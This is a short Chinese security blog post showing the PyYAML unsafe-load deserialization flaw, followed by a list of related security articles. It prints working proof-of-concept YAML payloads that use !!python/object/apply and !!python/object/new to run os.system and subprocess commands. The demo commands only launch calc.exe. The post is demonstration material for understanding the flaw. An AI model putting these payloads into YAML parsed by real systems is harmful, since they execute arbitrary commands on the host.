pyyaml反序列化漏洞

原創 黑面狐 2020-06-02 04:11

pyyaml在解析含有!!開頭的數據會強制進行類型轉換成字符串格式。

測試

import yaml
yaml.load('!!python/object/apply:os.system ["date"]')

 

結果

poc還可以

!!python/object/apply:subprocess.check_output [[calc.exe]]
!!python/object/apply:subprocess.check_output ["calc.exe"]
!!python/object/apply:subprocess.check_output [["calc.exe"]]
!!python/object/apply:os.system ["calc.exe"]
!!python/object/new:subprocess.check_output [["calc.exe"]]
!!python/object/new:os.system ["calc.exe"]

參考:http://www.polaris-lab.com/index.php/archives/375/

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

內網滲透(上)

每日一句: 做安全,有一定實力的話。找工作,待遇不好就不要去,不要委屈求全。 世界上好地方那麼多,不出去看看的話,你就以爲這就是世界 另外,二進制其實也不是多值錢的玩意,沒必要覺得多深奧 聲明: 內網滲透

划水的小白白 2020-07-08 00:37:05

隱藏在圖片裏的後門

一、前言 本文原創作者:sucppVK,本文屬i春秋原創獎勵計劃,未經許可禁止轉載! 先說明三點:   這個後門就是一句話木馬這個不同於我們常說的圖片馬這個後門是過安全狗的 這個不算什麼新姿勢,只不過被提到的次數比較少 (各大論壇常見的

i春秋论坛 2020-07-07 05:14:23

PHP 限制訪問ip白名單

摘要: web系統經常會做到只允許內部服務器交互的情況,比如我的swoole機器與web機器交互.爲了安全,也爲了方便,我沒有做加密傳輸,而是簡單的做了ip白名單限制   一  上代碼   config.php //ip白名單配

布叔喂丶 2020-07-06 11:17:09

web安全之跨站腳本攻擊XSS與防範方法

跨站腳本攻擊(Cross Site Script爲了區別於CSS簡稱爲XSS)指的是惡意攻擊者往Web頁面裏插入惡意html代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的html代碼會被執行,從而達到惡意用戶的特殊目的。 一個簡單的留

Mark_Melon 2020-07-06 10:29:04

內網滲透 -- 獲取內網中其他主機權限

  每天早上醒來你有兩個選擇:一是蓋上被子繼續做你沒做完的夢,二是掀開被子去完成你未完成的夢。。。 ----  網易雲熱評 環境:小攻:Kali 2020,ip:192.168.1.133           小受:win7 x86,ip

web安全工具库 2020-07-05 13:24:00

web安全系列之環境準備

web安全系列之環境準備準備環境安裝kali linux 2.0安裝centos 7安裝mysql安裝 java安裝 Apache Tomcat安裝PHP安裝 Nginx安裝 DVWA 準備環境 攻擊攻擊機kali linux 2

enjoy5512 2020-07-05 03:37:20

被動信息收集:使用OSINT框架進行信息收集

開源網絡情報(OSINT)庫,它是指可以合法地從有關個人或組織的免費公共來源中收集的任何信息。我一般簡單理解爲,就是被動信息收集。 被動收集的好處 與目標系統不產生直接交互 儘量避免留下痕跡 被動收集的難點 被動信息收集的難點

尸者狗 2020-07-04 06:50:48

搭建Nacos環境

官方地址:https://nacos.io github地址:https://github.com/alibaba/nacos Nacos環境搭建 方式1.從 Github 上下載源碼方式 git clone https://github

浪_淘_沙 2020-07-03 15:48:38

系統垂直越權與水平越權漏洞修復記錄

最近系統的安全滲透測試中,檢測出存在垂直越權和水平越權的漏洞。確實項目的權限管理,只是限制到菜單和按鈕粒度,沒有細到業務代碼的每個接口上。在此記錄一下自己的修復思路。 一、什麼是垂直/水平越權? 水平越權 何爲水平越權呢?就是相同權限用戶

代码要像诗 2020-07-03 10:09:11

Bypass disable_function —— LD_PRELOAD

Bypass disable_function —— LD_PRELOAD CTFHub-web技能樹中的一道題 做這道題之前,先要稍微瞭解下: LD_PRELOAD: 是Linux系統的一個環境變量,它指定的*.so文件會在程序

Hausa_ 2020-07-02 17:02:09

從任意文件下載漏洞到拿下多臺內網服務器權限

文章涉密部分,會進行大量打碼,敬請諒解 一、從一個任意文件下載漏洞說起 客戶內網系統中有一個系統上線前例行安全檢測。 我接到單子之後開始整活~ 打開系統,首先看看有沒有上傳點,興沖沖找了一圈,失望而歸。不過好歹有一個文件下載的

nini_boom 2020-07-02 10:27:46

XXE

1.XML 什麼是xml,他是用來幹什麼的? xml(xtensible markup language),可擴展標記語言,其實就是一種傳輸文本的格式,他的格式和html的格式非常相似,通常是來做配置文件和存貯數據。而後來出

frinck 2020-07-02 09:10:46

ms sql server手工注入提權原理及高級技巧

ms sql server 判斷注入點: and 1=1返回正常 and 1=2 返回錯誤 ✌以下注入判斷都是通過錯誤信息來進行查詢數據,和修改數據庫 判斷版本號 : and @@ version>0: mircoso

frinck 2020-07-02 07:39:36

序列化與反序列

概述? 序列化與反序列化時相對於對象來說的,在很多應用中讓他們需要將存在內存中的對象離開內存,從而進入硬盤以便長期保存。例如在web服務器中session對象中,當有10萬用戶併發訪問的時候,就有10萬個session對象,此時內

frinck 2020-07-02 07:39:36

‍web (iis)超強加固

原文可進入個人主頁查看 ?‍?中間件加固:iis 啓動(網站都已dvbbs作爲示範) 程序–管理工具–iis服務管理器–網站—dvbbs—右鍵–屬性 修改默認日誌的路徑:網站—配置—d:\dvbbslog:權限:僅syste

frinck 2020-07-02 07:39:36